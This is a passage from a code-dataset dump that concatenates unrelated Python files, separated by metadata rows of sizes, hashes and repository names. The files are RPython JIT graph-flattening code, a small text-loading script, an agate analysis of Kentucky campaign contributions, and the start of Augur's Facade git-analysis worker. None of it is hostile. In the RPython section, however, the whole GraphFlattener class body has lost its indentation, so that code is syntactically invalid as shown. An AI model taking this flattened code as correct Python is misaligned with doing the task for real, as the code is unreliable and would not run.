    emitted instruction tuples.  '_insns_pos' stays None until the repr is
    assembled."""
    def __init__(self, name):
        self.name = name
        self.insns = []
        self._insns_pos = None  # filled in after being assembled
class Label(object):
    """Definition point of a jump target, identified by name; compares
    equal to another Label with the same name."""
    def __init__(self, name):
        self.name = name
    def __repr__(self):
        return "Label(%r)" % (self.name,)
    def __eq__(self, other):
        if not isinstance(other, Label):
            return False
        return other.name == self.name
class TLabel(object):
    """Reference to a jump target (the 'use' side of a Label), identified
    by name; compares equal to another TLabel with the same name."""
    def __init__(self, name):
        self.name = name
    def __repr__(self):
        return "TLabel(%r)" % (self.name,)
    def __eq__(self, other):
        if not isinstance(other, TLabel):
            return False
        return other.name == self.name
class Register(object):
    """A virtual register of a given kind ('int', 'ref' or 'float') at a
    fixed color/index."""
    def __init__(self, kind, index):
        self.kind = kind
        self.index = index
    def __repr__(self):
        # e.g. '%i3' for the int register with index 3
        return "%%%s%d" % (self.kind[0], self.index)
class ListOfKind(object):
    """An immutable sequence of Regs/Consts that are all of one 'kind'.
    A plain list would not do: an empty one could not say which kind of
    items it is supposed to hold."""
    def __init__(self, kind, content):
        assert kind in KINDS
        self.kind = kind
        self.content = tuple(content)
    def __repr__(self):
        return '%s%s' % (self.kind[0].upper(), list(self.content))
    def __iter__(self):
        return iter(self.content)
    def __nonzero__(self):
        # Python 2 truth value: non-empty content.
        return bool(self.content)
    def __eq__(self, other):
        if not isinstance(other, ListOfKind):
            return False
        return self.kind == other.kind and self.content == other.content
class IndirectCallTargets(object):
    """Wrapper around the list of JitCodes an indirect call may reach."""
    def __init__(self, lst):
        # list of JitCodes
        self.lst = lst
    def __repr__(self):
        return '<IndirectCallTargets>'
# The three kinds of values/registers handled throughout this module.
KINDS = ['int', 'ref', 'float']
# ____________________________________________________________
def flatten_graph(graph, regallocs, _include_all_exc_links=False):
    """Flatten the graph into an SSARepr, with already-computed register
    allocations. 'regallocs' in a dict {kind: RegAlloc}."""
    worker = GraphFlattener(graph, regallocs, _include_all_exc_links)
    worker.enforce_input_args()
    worker.generate_ssa_form()
    return worker.ssarepr
class GraphFlattener(object):
def __init__(self, graph, regallocs, _include_all_exc_links=False):
self.graph = graph
self.regallocs = regallocs
self._include_all_exc_links = _include_all_exc_links
self.registers = {}
if graph:
name = graph.name
else:
name = '?'
self.ssarepr = SSARepr(name)
def enforce_input_args(self):
inputargs = self.graph.startblock.inputargs
numkinds = {}
for v in inputargs:
kind = getkind(v.concretetype)
if kind == 'void':
continue
curcol = self.regallocs[kind].getcolor(v)
realcol = numkinds.get(kind, 0)
numkinds[kind] = realcol + 1
if curcol != realcol:
assert curcol > realcol
self.regallocs[kind].swapcolors(realcol, curcol)
def generate_ssa_form(self):
self.seen_blocks = {}
self.make_bytecode_block(self.graph.startblock)
def make_bytecode_block(self, block):
if block.exits == ():
self.make_return(block.inputargs)
return
if block in self.seen_blocks:
self.emitline("goto", TLabel(block))
self.emitline("---")
return
# inserting a goto not necessary, falling through
self.seen_blocks[block] = True
self.emitline(Label(block))
#
operations = block.operations
for i, op in enumerate(operations):
self.serialize_op(op)
#
self.insert_exits(block)
def make_return(self, args):
if len(args) == 1:
# return from function
[v] = args
kind = getkind(v.concretetype)
if kind == 'void':
self.emitline("void_return")
else:
self.emitline("%s_return" % kind, self.getcolor(args[0]))
elif len(args) == 2:
# exception block, raising an exception from a function
if isinstance(args[1], Variable):
self.emitline("-live-") # xxx hack
self.emitline("raise", self.getcolor(args[1]))
else:
raise Exception("?")
self.emitline("---")
def make_link(self, link):
if (link.target.exits == ()
and link.last_exception not in link.args
and link.last_exc_value not in link.args):
self.make_return(link.args) # optimization only
return
self.insert_renamings(link)
self.make_bytecode_block(link.target)
def make_exception_link(self, link):
# Like make_link(), but also introduces the 'last_exception' and
# 'last_exc_value' as variables if needed. Also check if the link
# is jumping directly to the re-raising exception block.
assert link.last_exception is not None
assert link.last_exc_value is not None
if link.target.operations == () and link.args == [link.last_exception,
link.last_exc_value]:
self.emitline("reraise")
self.emitline("---")
return # done
self.make_link(link)
def insert_exits(self, block):
if len(block.exits) == 1:
# A single link, fall-through
link = block.exits[0]
assert link.exitcase in (None, False, True)
# the cases False or True should not really occur, but can show
# up in the manually hacked graphs for generators...
self.make_link(link)
#
elif block.canraise:
# An exception block. See test_exc_exitswitch in test_flatten.py
# for an example of what kind of code this makes.
index = -1
while True:
lastopname = block.operations[index].opname
if lastopname != '-live-':
break
index -= 1
assert block.exits[0].exitcase is None # is this always True?
#
if not self._include_all_exc_links:
if index == -1:
# cannot raise: the last instruction is not
# actually a '-live-'
self.make_link(block.exits[0])
return
#
self.emitline('catch_exception', TLabel(block.exits[0]))
self.make_link(block.exits[0])
self.emitline(Label(block.exits[0]))
for link in block.exits[1:]:
if (link.exitcase is Exception or
(link.exitcase is OverflowError and
lastopname.startswith('int_') and
lastopname.endswith('_ovf'))):
# this link captures all exceptions
self.make_exception_link(link)
break
self.emitline('goto_if_exception_mismatch',
Constant(link.llexitcase,
lltype.typeOf(link.llexitcase)),
TLabel(link))
self.make_exception_link(link)
self.emitline(Label(link))
else:
# no link captures all exceptions, so we have to put a reraise
# for the other exceptions
self.emitline("reraise")
self.emitline("---")
#
elif len(block.exits) == 2 and (
isinstance(block.exitswitch, tuple) or
block.exitswitch.concretetype == lltype.Bool):
# Two exit links with a boolean condition
linkfalse, linktrue = block.exits
if linkfalse.llexitcase == True:
linkfalse, linktrue = linktrue, linkfalse
opname = 'goto_if_not'
livebefore = False
if isinstance(block.exitswitch, tuple):
# special case produced by jtransform.optimize_goto_if_not()
opname = 'goto_if_not_' + block.exitswitch[0]
opargs = block.exitswitch[1:]
if opargs[-1] == '-live-before':
livebefore = True
opargs = opargs[:-1]
else:
assert block.exitswitch.concretetype == lltype.Bool
opargs = [block.exitswitch]
#
lst = self.flatten_list(opargs) + [TLabel(linkfalse)]
if livebefore:
self.emitline('-live-')
self.emitline(opname, *lst)
if not livebefore:
self.emitline('-live-', TLabel(linkfalse))
# true path:
self.make_link(linktrue)
# false path:
self.emitline(Label(linkfalse))
self.make_link(linkfalse)
#
else:
# A switch.
#
switches = [link for link in block.exits
if link.exitcase != 'default']
switches.sort(key=lambda link: link.llexitcase)
kind = getkind(block.exitswitch.concretetype)
assert kind == 'int' # XXX
#
# A switch on an integer, implementable efficiently with the
# help of a SwitchDictDescr. We use this even if there are
# very few cases: in pyjitpl.py, opimpl_switch() will promote
# the int only if it matches one of the cases.
from rpython.jit.codewriter.jitcode import SwitchDictDescr
switchdict = SwitchDictDescr()
switchdict._labels = []
self.emitline('-live-') # for 'guard_value'
self.emitline('switch', self.getcolor(block.exitswitch),
switchdict)
# emit the default path
if block.exits[-1].exitcase == 'default':
self.make_link(block.exits[-1])
else:
self.emitline("unreachable")
self.emitline("---")
#
for switch in switches:
key = lltype.cast_primitive(lltype.Signed,
switch.llexitcase)
switchdict._labels.append((key, TLabel(switch)))
# emit code for that path
# note: we need a -live- for all the 'guard_false' we produce
# if the switched value doesn't match any case.
self.emitline(Label(switch))
self.emitline('-live-')
self.make_link(switch)
def insert_renamings(self, link):
renamings = {}
lst = [(self.getcolor(v), self.getcolor(link.target.inputargs[i]))
for i, v in enumerate(link.args)
if v.concretetype is not lltype.Void and
v not in (link.last_exception, link.last_exc_value)]
lst.sort(key=lambda(v, w): w.index)
for v, w in lst:
if v == w:
continue
frm, to = renamings.setdefault(w.kind, ([], []))
frm.append(v)
to.append(w)
for kind in KINDS:
if kind in renamings:
frm, to = renamings[kind]
# Produce a series of %s_copy. If there is a cycle, it
# is handled with a %s_push to save the first value of
# the cycle, some number of %s_copy, and finally a
# %s_pop to load the last value.
result = reorder_renaming_list(frm, to)
for v, w in result:
if w is None:
self.emitline('%s_push' % kind, v)
elif v is None:
self.emitline('%s_pop' % kind, "->", w)
else:
self.emitline('%s_copy' % kind, v, "->", w)
self.generate_last_exc(link, link.target.inputargs)
def generate_last_exc(self, link, inputargs):
# Write 'last_exc_xxx' operations that load the last exception
# directly into the locations specified by 'inputargs'. This
# must be done at the end of the link renamings.
if link.last_exception is link.last_exc_value is None:
return
for v, w in zip(link.args, inputargs):
if v is link.last_exception:
self.emitline("last_exception", "->", self.getcolor(w))
for v, w in zip(link.args, inputargs):
if v is link.last_exc_value:
self.emitline("last_exc_value", "->", self.getcolor(w))
def emitline(self, *line):
self.ssarepr.insns.append(line)
def flatten_list(self, arglist):
args = []
for v in arglist:
if isinstance(v, Variable):
v = self.getcolor(v)
elif isinstance(v, Constant):
pass
elif isinstance(v, ListOfKind):
lst = [self.getcolor(x) for x in v]
v = ListOfKind(v.kind, lst)
elif isinstance(v, (AbstractDescr,
IndirectCallTargets)):
pass
else:
raise NotImplementedError(type(v))
args.append(v)
return args
    def serialize_op(self, op):
        """Emit one flattened instruction for the flow-graph operation 'op'.

        Arguments are flattened first; if the operation produces a non-void
        result, an "->" marker and the result register are appended.
        """
        args = self.flatten_list(op.args)
        if op.result is not None:
            kind = getkind(op.result.concretetype)
            if kind != 'void':
                args.append("->")
                args.append(self.getcolor(op.result))
        self.emitline(op.opname, *args)
    def getcolor(self, v):
        """Return the Register assigned to variable 'v' (Constants pass through).

        Registers are cached per (kind, color) so the same slot is always
        represented by the same Register object.
        """
        if isinstance(v, Constant):
            return v
        kind = getkind(v.concretetype)
        col = self.regallocs[kind].getcolor(v)    # if kind=='void', fix caller
        try:
            r = self.registers[kind, col]
        except KeyError:
            r = self.registers[kind, col] = Register(kind, col)
        return r
# ____________________________________________________________
def reorder_renaming_list(frm, to):
    """Order the renamings (frm[i] -> to[i]) so no value is clobbered early.

    Returns a list of (v, w) pairs such that every source register is read
    before the renaming that overwrites it.  A cycle is broken by emitting
    (v, None) -- meaning "push v" -- and later (None, w) -- "pop into w".

    Note: breaking a cycle mutates ``frm`` in place (the pushed entry is
    replaced by None); callers pass throwaway lists, so this is safe.
    """
    result = []
    # Explicit list: the loop below repeatedly rebinds and tests emptiness,
    # which relied on Python 2's list-returning range().
    pending_indices = list(range(len(to)))
    while pending_indices:
        # Sources that still need to be read by some pending renaming.
        # (A set, not a dict-as-set, since only membership is needed.)
        not_read = set(frm[i] for i in pending_indices)
        still_pending_indices = []
        for i in pending_indices:
            if to[i] not in not_read:
                # Safe to write to[i] now -- nobody still reads it.
                result.append((frm[i], to[i]))
            else:
                still_pending_indices.append(i)
        if len(pending_indices) == len(still_pending_indices):
            # No progress -- there is a cycle.  Push the first pending
            # source to a stack slot and retire its read.
            assert None not in not_read
            result.append((frm[pending_indices[0]], None))
            frm[pending_indices[0]] = None
            continue
        pending_indices = still_pending_indices
    return result
| 39.244156
| 79
| 0.551128
|
4a15c38ba93f38dec846a9c3f96eb8b3fd92d863
| 299
|
py
|
Python
|
data/clean_txt.py
|
iejMac/ScriptWriter
|
24358762643d48296a055850b82631877c04fe94
|
[
"MIT"
] | null | null | null |
data/clean_txt.py
|
iejMac/ScriptWriter
|
24358762643d48296a055850b82631877c04fe94
|
[
"MIT"
] | null | null | null |
data/clean_txt.py
|
iejMac/ScriptWriter
|
24358762643d48296a055850b82631877c04fe94
|
[
"MIT"
] | null | null | null |
import os
def get_txt(script_name):
    """Return the full text of *script_name* read from TXT_DIR."""
    path = os.path.join(TXT_DIR, script_name)
    with open(path, "r") as handle:
        return handle.read()
TXT_DIR = "txt_dir"

# Load every script in the corpus and report the length of each one.
scripts = [get_txt(name) for name in os.listdir(TXT_DIR)]
for script in scripts:
    print(len(script))
| 10.310345
| 59
| 0.672241
|
4a15c3b71a2b00befe99c874ab3a2c8172f06a3f
| 14,430
|
py
|
Python
|
analyze.py
|
louisvillepublicmedia/2016-campaign-finance
|
fc54530356e3541ea750562fdb548f7dcdd0a124
|
[
"MIT"
] | null | null | null |
analyze.py
|
louisvillepublicmedia/2016-campaign-finance
|
fc54530356e3541ea750562fdb548f7dcdd0a124
|
[
"MIT"
] | null | null | null |
analyze.py
|
louisvillepublicmedia/2016-campaign-finance
|
fc54530356e3541ea750562fdb548f7dcdd0a124
|
[
"MIT"
] | null | null | null |
import agate, os, itertools, time, datetime, glob
from datetime import date
# Shared agate column-type helpers.  Receipt dates in the FEC extracts are
# text like '21-APR-15', so force that column to Text and parse it later.
text_type = agate.Text()
tester = agate.TypeTester(force={
    'contb_receipt_dt': agate.Text()
})

today = date.today()
# e.g. '2016412' -- month/day are not zero-padded.
datestamp = str(today.year) + str(today.month) + str(today.day)

# Locate the processed CSV extracts (first glob match wins; raises
# IndexError if a file is missing -- presumably the pipeline guarantees it).
ky_candidates_file = str(glob.glob('data/csv/process/*ky-candidate-contributions.csv')[0])
ky_all_contributions_file = str(glob.glob('data/csv/process/*ky-individual-contribs.csv')[0])
cmte_list_file = str(glob.glob('data/csv/process/*cmte-list.csv')[0])

# Load the three working tables once at import time.
ky_candidate_contributions = agate.Table.from_csv(ky_candidates_file, column_types=tester)
ky_all_contributions = agate.Table.from_csv(ky_all_contributions_file, delimiter='|')
cmte_list = agate.Table.from_csv(cmte_list_file, delimiter='|')

# FEC committee ids of candidates still in the race at last update.
current_candidate_cmte_ids = ['C00580100','C00575795']
#Trump, Donald J. = C00580100
#Sanders, Bernard = C00577130
#Kasich, John R. = C00581876
#Clinton, Hillary Rodham = C00575795
#Cruz, Rafael Edward 'Ted' = C00574624
def print_state():
    """Record which state this data set covers in the generated JS file."""
    line = 'state = "Kentucky"'
    generated_js.write(line)
def print_updated():
    """Stamp the generated JS file with today's locale-formatted date."""
    stamp = time.strftime("%x")
    generated_js.write('updated = "%s"\n' % stamp)
def print_ky_overall_summary():
    """Report the total count and dollar sum of all KY contributions
    (to candidates and PACs alike) and write them into the generated JS."""
    total = ky_all_contributions.aggregate(agate.Sum('TRANSACTION_AMT'))
    count = ky_all_contributions.aggregate(agate.Count())
    print('{} donations, totaling ${} have been donated by Kentuckians to the 2016 presidential race.'.format(count, total))
    generated_js.write('total_donated_sum = {}\ntotal_donated_count = {}\n'.format(total, count))
def print_ky_candidate_summary():
    """Report count/sum of KY contributions made specifically to
    presidential candidate committees, and write them into the JS."""
    total = ky_candidate_contributions.aggregate(agate.Sum('contb_receipt_amt'))
    count = ky_candidate_contributions.aggregate(agate.Count())
    print('{} donations, totaling ${} have been donated by Kentuckians specifically to the 2016 presidential candidates.'.format(count, total))
    generated_js.write('total_candidate_donated_sum = {}\ntotal_candidate_donated_count = {}\n'.format(total, count))
def print_ky_current_candidate_sum():
    """Print how much KY money has gone to candidates still in the race
    (those listed in current_candidate_cmte_ids)."""
    still_running = ky_candidate_contributions.where(
        lambda r: r['cmte_id'] in current_candidate_cmte_ids
    )
    donation_count = still_running.aggregate(agate.Count())
    donation_total = still_running.aggregate(agate.Sum('contb_receipt_amt'))
    field_size = len(current_candidate_cmte_ids)
    print('There are currently {0} candidates running for president. Those {0} candidates have received {1} donations totaling ${2}'.format(
        field_size, donation_count, donation_total))
# How much money has been donated by Kentuckians to Democratic candidate
# committees? Republican candidate committees?
def print_contributions_by_cmte_type():
    """Report KY contribution counts and sums split by party.

    The committee-id lists are hard coded below; they were originally
    derived from the FEC committee master file (CMTE_PTY_AFFILIATION in
    cm16.csv) -- the derivation code was dead/commented and has been
    removed.  The per-party reporting is factored into one loop so the
    Republican and Democratic branches cannot drift apart.
    """
    rep_cmte_id_list = [
        'C00579458', 'C00573519', 'C00580399', 'C00574624', 'C00577312',
        'C00578757', 'C00577981', 'C00581876', 'C00575449', 'C00458844',
        'C00578492', 'C00580100', 'C00580480'
    ]
    # Jeb Bush = C00579458, Carson = C00573519, Christie = C00580399,
    # Cruz = C00574624, Fiorino = C00577312, Graham = C00578757,
    # Huckabee = C00577981, Kasich = C00581876, Paul = C00575449,
    # Rubio = C00458844, Santorum = C00578492, Trump = C00580100,
    # Walker = C00580480
    dem_cmte_id_list = ['C00575795', 'C00583146', 'C00578658', 'C00577130', 'C00581215']
    # Clinton = C00575795, Lessig = C00583146, OMalley = C00578658,
    # Sanders = C00577130, Webb = C00581215

    # Report Republicans first, then Democrats (output order matters for
    # the generated JS file).
    for party, js_var, id_list in (
            ('Republican', 'to_republicans', rep_cmte_id_list),
            ('Democratic', 'to_democrats', dem_cmte_id_list)):
        contribs = ky_candidate_contributions.where(
            lambda r: r['cmte_id'] in id_list
        )
        count = contribs.aggregate(agate.Count())
        total = contribs.aggregate(agate.Sum('contb_receipt_amt'))
        print(str(count) + ' contributions to ' + party + ' committees, totaling $' + str(total))
        generated_js.write(js_var + ' = ' + str(total) + '\n')
# How much money has been donated to each presidential candidate from Kentuckians?
# How many donations did each presidential candidate receive from Kentuckians?
def ky_by_candidate():
    """Write a JS array of per-candidate totals, current candidates first
    (all of them), then dropped candidates with more than $25,000 raised.
    """
    generated_js.write('candidate_contributions = [')
    # Candidates still in the race.
    current_cand_ky_contrib = ky_candidate_contributions.where(
        lambda r: r['cmte_id'] in current_candidate_cmte_ids
    )
    current_candidate_groups = current_cand_ky_contrib.group_by('cand_nm')
    current_candidate_totals = current_candidate_groups.aggregate([
        ('contributions_count', agate.Count()),
        ('contributions_sum', agate.Sum('contb_receipt_amt'))
    ])
    sorted_current_candidate_totals = current_candidate_totals.order_by('contributions_sum', reverse=True)
    for row in sorted_current_candidate_totals.rows:
        # row = (cand_nm, contributions_count, contributions_sum)
        generated_js.write('{name: "' + row[0] + '", count: ' + str(row[1]) + ', sum: ' + str(row[2]) + ', status: "current"},')
    # Candidates who have dropped out.
    dropped_cand_ky_contrib = ky_candidate_contributions.where(
        lambda r: r['cmte_id'] not in current_candidate_cmte_ids
    )
    dropped_candidate_groups = dropped_cand_ky_contrib.group_by('cand_nm')
    dropped_candidate_totals = dropped_candidate_groups.aggregate([
        ('contributions_count', agate.Count()),
        ('contributions_sum', agate.Sum('contb_receipt_amt'))
    ])
    sorted_dropped_candidate_totals = dropped_candidate_totals.order_by('contributions_sum', reverse=True)
    # Only show dropped candidates who raised a meaningful amount.
    filtered_dropped_candidate_totals = sorted_dropped_candidate_totals.where(
        lambda r: r['contributions_sum'] > 25000
    )
    for row in filtered_dropped_candidate_totals.rows:
        generated_js.write('{name: "' + row[0] + '", count: ' + str(row[1]) + ', sum: ' + str(row[2]) + ', status: "dropped"},')
    generated_js.write(']\n')
def candidate_time_charts():
    """Regenerate app/data/candidate_charts.js with per-candidate monthly
    contribution count/sum series for the Chartist charts.

    NOTE(review): os.remove raises if the file does not already exist --
    presumably a previous run always leaves one behind; confirm.
    """
    os.remove('app/data/candidate_charts.js')
    text_type = agate.Text()
    datetime_type = agate.DateTime()
    chart_js = open('app/data/candidate_charts.js', 'a')
    # Derive a 'MMM-YY' bucket and a parsed date from the text receipt date.
    candidate_contribs_with_monthyear = ky_candidate_contributions.compute([
        ('month_year', agate.Formula(text_type, lambda r: r['contb_receipt_dt'][-6:])),
        ('date', agate.Formula(text_type, lambda r: datetime.datetime.strptime(r['contb_receipt_dt'], '%d-%b-%y')))
    ])
    date_sorted_candidat_contribs = candidate_contribs_with_monthyear.order_by('date')
    # Drop everything before March 2015 (string comparison against the
    # stringified datetime produced by the Formula above).
    restricted_date_candidate_contribs = date_sorted_candidat_contribs.where(
        lambda r: r['date'] > '2015-02-28 00:00:00'
    )
    by_candidate_contribs = candidate_contribs_with_monthyear.group_by('cand_nm')
    # We need a list of unique candidates and a list of unique month_years.
    # Then, for each month_year and each candidate, how many contributions
    # happened.  One shared label list:
    #   labels = ['FEB-15', 'MAR-15', ...]
    # and per candidate:
    #   candidateName_series = [200, 34, 885, 123, ...]
    # Unique month_years in date order -- these are the chart labels.
    month_years = []
    for row in restricted_date_candidate_contribs.rows:
        month_year = row['month_year']
        if month_year in month_years:
            pass
        else:
            month_years.append(str(month_year))
    # Unique candidate names.
    candidates = []
    for row in candidate_contribs_with_monthyear.rows:
        candidate = row['cand_nm']
        if candidate in candidates:
            pass
        else:
            candidates.append(candidate)
    # Per (candidate, month) aggregates.
    candidate_month_year_groups = by_candidate_contribs.group_by(
        lambda r: r['month_year'],
        key_name='month_year_group'
    )
    month_year_counts = candidate_month_year_groups.aggregate([
        ('contribution_count', agate.Count()),
        ('contribution_sum', agate.Sum('contb_receipt_amt'))
    ])
    #month_year_counts.print_table(max_rows=200)
    chart_js.write('count_labels = ' + str(month_years) + '\n')
    # For each candidate and month, emit one {meta, value} entry for count
    # and one for sum; months with no matching row get a '0' placeholder.
    for candidate in candidates:
        count_value_list = []
        sum_value_list = []
        for month in month_years:
            contrib_count = 0
            contrib_sum = 0
            for row in month_year_counts.rows:
                if row['cand_nm'] == candidate:
                    # NOTE(review): series_label is only bound inside this
                    # branch -- a candidate with no rows in month_year_counts
                    # would raise NameError at the write below.  Confirm every
                    # candidate in 'candidates' has at least one row.
                    series_label = candidate.split(',')[0].lower()
                    if month == row['month_year_group']:
                        # Reassigning to str() here also makes the
                        # '== 0' placeholder checks below fail, which is
                        # what suppresses the duplicate zero entry.
                        contrib_count = str(row['contribution_count'])
                        contrib_count_dict = {}
                        contrib_count_dict['meta'] = str('Contributions to ' + candidate + ' for ' + month)
                        contrib_count_dict['value'] = contrib_count
                        count_value_list.append(dict(contrib_count_dict))
                        contrib_sum = str(row['contribution_sum'])
                        contrib_sum_dict = {}
                        contrib_sum_dict['meta'] = str('Amt. contributed to ' + candidate + ' for ' + month)
                        contrib_sum_dict['value'] = contrib_sum
                        sum_value_list.append(dict(contrib_sum_dict))
                    else:
                        pass
            # No row matched this month -- emit explicit zero placeholders.
            if contrib_count == 0:
                contrib_count_dict = {}
                contrib_count_dict['meta'] = str('Contributions to ' + candidate + ' for ' + month)
                contrib_count_dict['value'] = '0'
                count_value_list.append(dict(contrib_count_dict))
            if contrib_sum == 0:
                contrib_sum_dict = {}
                contrib_sum_dict['meta'] = str('Amount contributed to ' + candidate + ' for ' + month)
                contrib_sum_dict['value'] = '0'
                sum_value_list.append(dict(contrib_sum_dict))
        chart_js.write(series_label + '_count_series = ' + str(count_value_list) + '\n')
        chart_js.write(series_label + '_sum_series = ' + str(sum_value_list) + '\n')
    chart_js.close()
def top_ky_donors_candidates():
    """Write the five biggest individual donors to candidate committees,
    by total amount donated, into the generated JS file."""
    by_donor = ky_candidate_contributions.group_by('contbr_nm')
    donor_totals = by_donor.aggregate([
        ('contributions_count', agate.Count()),
        ('contributions_sum', agate.Sum('contb_receipt_amt'))
    ])
    ranked = donor_totals.order_by('contributions_sum', reverse=True)
    ranked.print_table()
    generated_js.write('top_donors_to_candidates = [')
    for row in itertools.islice(ranked.rows, 0, 5):
        generated_js.write('{name: "' + row[0] + '", count: ' + str(row[1]) + ', sum: ' + str(row[2]) + '},')
    generated_js.write(']\n')
def top_ky_donors_pac():
    """Write the five biggest KY donors across all contributions (PACs
    included), by total amount donated, into the generated JS file."""
    by_donor = ky_all_contributions.group_by('NAME')
    donor_totals = by_donor.aggregate([
        ('contributions_count', agate.Count()),
        ('contributions_sum', agate.Sum('TRANSACTION_AMT'))
    ])
    ranked = donor_totals.order_by('contributions_sum', reverse=True)
    ranked.print_table()
    generated_js.write('top_donors_to_pacs = [')
    for row in itertools.islice(ranked.rows, 0, 5):
        generated_js.write('{name: "' + row[0] + '", count: ' + str(row[1]) + ', sum: ' + str(row[2]) + '},')
    generated_js.write(']\n')
# Regenerate app/data/ky_totals.js from scratch, then run every report.
# NOTE(review): os.remove raises FileNotFoundError if the file does not
# exist yet -- confirm a previous copy always ships, or guard the call.
os.remove('app/data/ky_totals.js')
generated_js = open('app/data/ky_totals.js', 'a')
candidate_time_charts()
top_ky_donors_pac()
top_ky_donors_candidates()
ky_by_candidate()
print_contributions_by_cmte_type()
print_ky_candidate_summary()
print_ky_overall_summary()
print_updated()
print_state()
generated_js.close()
| 41.585014
| 264
| 0.670755
|
4a15c48152e1745b172bd9167adfba64c4805037
| 13,075
|
py
|
Python
|
workers/facade_worker/facade_worker/facade00mainprogram.py
|
pratikmishra356/augur
|
6f45fb7428af83b09a0c9dbf08116a59f58520aa
|
[
"MIT"
] | null | null | null |
workers/facade_worker/facade_worker/facade00mainprogram.py
|
pratikmishra356/augur
|
6f45fb7428af83b09a0c9dbf08116a59f58520aa
|
[
"MIT"
] | null | null | null |
workers/facade_worker/facade_worker/facade00mainprogram.py
|
pratikmishra356/augur
|
6f45fb7428af83b09a0c9dbf08116a59f58520aa
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright 2016-2018 Brian Warner
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# SPDX-License-Identifier: Apache-2.0
# Git repo maintenance
#
# This script is responsible for cloning new repos and keeping existing repos up
# to date. It can be run as often as you want (and will detect when it's
# already running, so as not to spawn parallel processes), but once or twice per
# day should be more than sufficient. Each time it runs, it updates the repo
# and checks for any parents of HEAD that aren't already accounted for in the
# repos. It also rebuilds analysis data, checks any changed affiliations and
# aliases, and caches data for display.
import pymysql, sys, platform, imp, time, datetime, html.parser, subprocess, os, getopt, xlsxwriter, configparser, logging
from multiprocessing import Process, Queue
from facade_worker.facade01config import Config#increment_db, update_db, migrate_database_config, database_connection, get_setting, update_status, log_activity
from facade_worker.facade02utilitymethods import update_repo_log, trim_commit, store_working_author, trim_author
from facade_worker.facade03analyzecommit import analyze_commit
from facade_worker.facade04postanalysiscleanup import git_repo_cleanup
from facade_worker.facade05repofetch import git_repo_initialize, check_for_repo_updates, force_repo_updates, force_repo_analysis, git_repo_updates
from facade_worker.facade06analyze import analysis
from facade_worker.facade07rebuildcache import nuke_affiliations, fill_empty_affiliations, invalidate_caches, rebuild_unknown_affiliation_and_web_caches
from workers.util import read_config
from workers.worker_base import Worker
# NOTE(review): this rebinds the imported 'html' module name to an
# HTMLParser instance; the instance is not used anywhere in this file's
# visible code -- confirm whether it (or the module) is still needed.
html = html.parser.HTMLParser()
class FacadeWorker(Worker):
    """Augur worker that runs the Facade git-repo maintenance/analysis cycle.

    Pulls 'commits' tasks off a multiprocessing queue and runs the classic
    facade-worker.py pipeline (clone/pull/analyze/affiliations/caches).
    """

    def __init__(self, config={}, task=None):
        # NOTE(review): mutable default for 'config' -- safe only if the
        # base Worker never mutates it in place; confirm.
        worker_type = "facade_worker"
        # Define what this worker can be given and know how to interpret
        given = [['repo_group']]
        models = ['commits']
        # Define the tables needed to insert, update, or delete on
        data_tables = []
        operations_tables = ['worker_history', 'worker_job']
        # Run the general worker initialization
        super().__init__(worker_type, config, given, models, data_tables, operations_tables)
        # Facade-specific config
        self.cfg = Config()
        # Define data collection info
        self.tool_source = 'Facade Worker'
        self.tool_version = '0.0.1'
        self.data_source = 'Git Log'

    def initialize_database_connections(self):
        """Open the general and 'people' DB connections used by facade."""
        # Set up the database
        db_user = self.config['user_database']
        db_pass = self.config['password_database']
        db_name = self.config['name_database']
        db_host = self.config['host_database']
        db_port = self.config['port_database']
        # Open a general-purpose connection
        self.db, self.cursor = self.cfg.database_connection(
            db_host,
            db_user,
            db_pass,
            db_name,
            db_port, False, False)
        # Open a connection for the people database
        self.db_people, self.cursor_people = self.cfg.database_connection(
            db_host,
            db_user,
            db_pass,
            db_name,
            db_port, True, False)
        # Check if the database is current and update it if necessary
        try:
            self.current_db = int(self.cfg.get_setting('database_version'))
        except:
            # Catch databases which existed before database versioning
            self.current_db = -1

    def collect(self):
        """Process entries from the worker's task queue.

        Runs in a child process, so logging and DB connections are
        (re)initialized here.  NOTE(review): the trailing 'break' after the
        try block means at most one task is processed per call -- confirm
        this is intentional.
        """
        self.initialize_logging()  # need to initialize logging again in child process cause multiprocessing
        self.logger.info("Starting data collection process\n")
        self.initialize_database_connections()
        while True:
            if not self._queue.empty():
                message = self._queue.get()  # Get the task off our MP queue
            else:
                break
            self.logger.info("Popped off message: {}\n".format(str(message)))
            if message['job_type'] == 'STOP':
                break
            # If task is not a valid job type
            if message['job_type'] != 'MAINTAIN' and message['job_type'] != 'UPDATE':
                raise ValueError('{} is not a recognized task type'.format(message['job_type']))
                pass  # NOTE(review): unreachable after the raise above
            try:
                self.commits_model(message)
            except Exception as e:
                self.logger.error(e)
                raise(e)
            break

    def commits_model(self, message):
        """Run the full facade pipeline, honoring config flags and any
        facade-worker.py style command-line options found in sys.argv."""
        # Figure out what we need to do
        limited_run = self.augur_config.get_value("Facade", "limited_run")
        delete_marked_repos = self.augur_config.get_value("Facade", "delete_marked_repos")
        pull_repos = self.augur_config.get_value("Facade", "pull_repos")
        clone_repos = self.augur_config.get_value("Facade", "clone_repos")
        check_updates = self.augur_config.get_value("Facade", "check_updates")
        force_updates = self.augur_config.get_value("Facade", "force_updates")
        run_analysis = self.augur_config.get_value("Facade", "run_analysis")
        force_analysis = self.augur_config.get_value("Facade", "force_analysis")
        nuke_stored_affiliations = self.augur_config.get_value("Facade", "nuke_stored_affiliations")
        fix_affiliations = self.augur_config.get_value("Facade", "fix_affiliations")
        force_invalidate_caches = self.augur_config.get_value("Facade", "force_invalidate_caches")
        rebuild_caches = self.augur_config.get_value("Facade", "rebuild_caches") #if abs((datetime.datetime.strptime(self.cfg.get_setting('aliases_processed')[:-3],
        # '%Y-%m-%d %I:%M:%S.%f') - datetime.datetime.now()).total_seconds()) // 3600 > int(self.cfg.get_setting(
        # 'update_frequency')) else 0
        # NOTE(review): duplicate read of force_invalidate_caches (also
        # fetched a few lines above) -- harmless but redundant.
        force_invalidate_caches = self.augur_config.get_value("Facade", "force_invalidate_caches")
        create_xlsx_summary_files = self.augur_config.get_value("Facade", "create_xlsx_summary_files")
